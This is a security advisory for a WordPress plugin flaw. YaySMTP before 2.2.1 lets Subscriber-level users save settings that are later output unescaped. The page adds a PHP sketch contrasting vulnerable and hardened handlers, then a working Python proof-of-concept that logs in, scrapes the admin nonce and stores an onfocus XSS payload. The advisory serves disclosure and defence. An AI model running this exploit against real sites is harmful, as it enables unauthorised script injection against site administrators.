WordPress Plugin Vulnerabilities

YaySMTP < 2.2.1 - Subscriber+ Stored Cross-Site Scripting

Description

The plugin does not have proper authorisation when saving its settings, allowing users with a role as low as Subscriber to change them and, because the saved values are not escaped when output, to conduct a Stored Cross-Site Scripting attack.

v2.2.1 fixed the authorisation issue but not the escaping one. A separate issue has been created for the latter.
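A defensive illustration of the two missing controls, written as an added example and not taken from the YaySMTP code base: a hypothetical settings-saving AJAX handler in the shape the advisory describes (nonce only, no capability check, value printed unescaped) beside a hardened version that requires `manage_options`, verifies the nonce, sanitises on save and escapes on output. The handler, action and option names (`yaysmtp_save_settings_*`, `yaysmtp_nonce`, `yaysmtp_settings`) are assumptions.

```php
<?php
// Added example (not YaySMTP's own code); handler/option names are hypothetical.

// VULNERABLE shape: a nonce is not authorisation. Any logged-in user who can read
// the nonce from the admin page can save settings, and the value is stored verbatim.
function yaysmtp_save_settings_vulnerable() {
    check_ajax_referer( 'yaysmtp_nonce', 'nonce' );
    $settings = isset( $_POST['settings'] ) ? (array) $_POST['settings'] : array();
    update_option( 'yaysmtp_settings', $settings );
    wp_send_json_success( $settings );
}

function yaysmtp_render_from_name_vulnerable() {
    $settings = get_option( 'yaysmtp_settings', array() );
    // Attribute context with no escaping: a value containing a double quote
    // followed by event-handler attributes breaks out of value="...".
    echo '<input type="text" name="settings[fromName]" value="' . $settings['fromName'] . '">';
}

// HARDENED shape: capability check first, then nonce, sanitise input, escape output.
function yaysmtp_save_settings_fixed() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    check_ajax_referer( 'yaysmtp_nonce', 'nonce' );
    $raw = isset( $_POST['settings'] ) ? (array) wp_unslash( $_POST['settings'] ) : array();

    // Whitelist the known keys and sanitise each one for its expected type.
    $settings = array(
        'fromEmail'      => sanitize_email( $raw['fromEmail'] ?? '' ),
        'fromName'       => sanitize_text_field( $raw['fromName'] ?? '' ),
        'forceFromEmail' => ! empty( $raw['forceFromEmail'] ) ? 1 : 0,
        'forceFromName'  => ! empty( $raw['forceFromName'] ) ? 1 : 0,
        'mailerProvider' => sanitize_key( $raw['mailerProvider'] ?? 'mail' ),
    );
    update_option( 'yaysmtp_settings', $settings );
    wp_send_json_success( $settings );
}

function yaysmtp_render_from_name_fixed() {
    $settings = get_option( 'yaysmtp_settings', array() );
    // esc_attr() encodes quotes and angle brackets, so the value cannot leave the attribute.
    echo '<input type="text" name="settings[fromName]" value="' . esc_attr( $settings['fromName'] ?? '' ) . '">';
}

// Only the hardened handler is registered; no nopriv variant, since the action is admin-only.
add_action( 'wp_ajax_yaysmtp_save_settings', 'yaysmtp_save_settings_fixed' );
```

Sanitising on save is defence in depth; the escaping fix (`esc_attr()` at output) is the control the advisory notes was still missing in 2.2.1.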

Proof of Concept

# @author : 0xshdax (Rafshanzani Suhada)
# @usage : python3 script.py http://localhost
import requests, sys, re, json

## Setup here
if len(sys.argv) != 2:
    print('Usage: python3 script.py http://localhost')
    sys.exit(1)
url = sys.argv[1].rstrip('/')
headers = { 'Content-Type': 'application/x-www-form-urlencoded' }
username = 'guest'   # credentials of a Subscriber-level account
password = 'guest'
# The plugin prints its AJAX nonce into the admin page as "ajaxNonce":"...","currentMailer"
regexnonce = r"\"ajaxNonce\":\"(.*?)(?:\",\"currentMailer\")"

##
def loginWP(username, password, url):
    session = requests.Session()
    cookies = { 'wordpress_test_cookie' : 'WP+Cookie+check' }
    data = { 'log' : username, 'pwd' : password, 'wp-submit' : 'Login', 'redirect_to' : url + '/wp-admin/', 'testcookie' : 1 }

    # Log in and follow the redirect to /wp-admin/, where the nonce is embedded
    response = session.post(url + '/wp-login.php', cookies=cookies, data=data)
    findnonce = re.findall(regexnonce, response.text)
    if not findnonce:
        print('[ * ] Nonce not found or invalid credentials. Please check again!')
        sys.exit(1)

    print('[ * ] Success get nonce!')
    # Save the plugin settings as a Subscriber; settings[fromName] carries the stored payload
    datalog = 'action=yaysmtp_save_settings&nonce=' + findnonce[0] + '&settings[fromEmail]=guest@localhost.id&settings[fromName]="autofocus onfocus=alert(/XSS/)// &settings[forceFromEmail]=1&settings[forceFromName]=0&settings[mailerProvider]=mail'
    getlogsmtp = session.post(url + '/wp-admin/admin-ajax.php', headers=headers, data=datalog)
    prettyjson = json.loads(getlogsmtp.text)
    print(json.dumps(prettyjson, indent=4))
    return findnonce[0]

print('[ * ] Trying to login user!')
getnonce = loginWP(username, password, url)

Affects Plugins

YaySMTP: fixed in 2.2.1

Classification

Type: XSS

Miscellaneous

Original Researcher: Rafshanzani Suhada
Submitter: Rafshanzani Suhada
Verified: Yes

Timeline

Publicly Published: 2022-07-18
Added: 2022-07-18
Last Updated: 2023-04-16